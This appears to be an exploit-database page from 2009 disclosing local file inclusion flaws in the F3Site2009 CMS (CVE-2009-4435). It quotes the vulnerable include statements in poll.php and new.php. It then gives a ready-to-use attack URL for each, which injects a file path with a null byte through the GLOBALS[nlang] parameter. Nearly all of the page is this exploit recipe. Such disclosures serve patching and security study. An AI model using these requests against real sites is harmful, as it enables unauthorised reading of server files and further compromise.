F3Site2009 Multiple LFI Exploit



EDB-ID: 10536 CVE: 2009-4435 OSVDB-ID: 61411
Author: cr4wl3r Published: 2009-12-18 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
 
Prev Home Next 

##################################################################
## Exploit Title: F3Site2009 Multiple LFI Exploit               ##
## Date: 18-12-2009                                             ##
## Author: cr4wl3r                                              ##
## Software Link: http://code.google.com/p/f3site/              ##
## Version: N/A                                                 ##
## Tested on: GNU/LINUX                                         ##
##################################################################

~ Code [poll.php] :

if(file_exists('./cache/poll_'.$GLOBALS['nlang'].'.php')):
   include('./cache/poll_'.$GLOBALS['nlang'].'.php');

~ 3xplo!t :

 [F3Site2009_path]/mod/poll.php?GLOBALS[nlang]=[LFI%00]


~ Code [new.php] :

if(file_exists('./cache/new-'.$GLOBALS['nlang'].'.php'))
{
	include './cache/new-'.$GLOBALS['nlang'].'.php';
}

~ 3xplo!t :

 [F3Site2009_path]/mod/new.php?GLOBALS[nlang]=[LFI%00]

Comments

No comments so far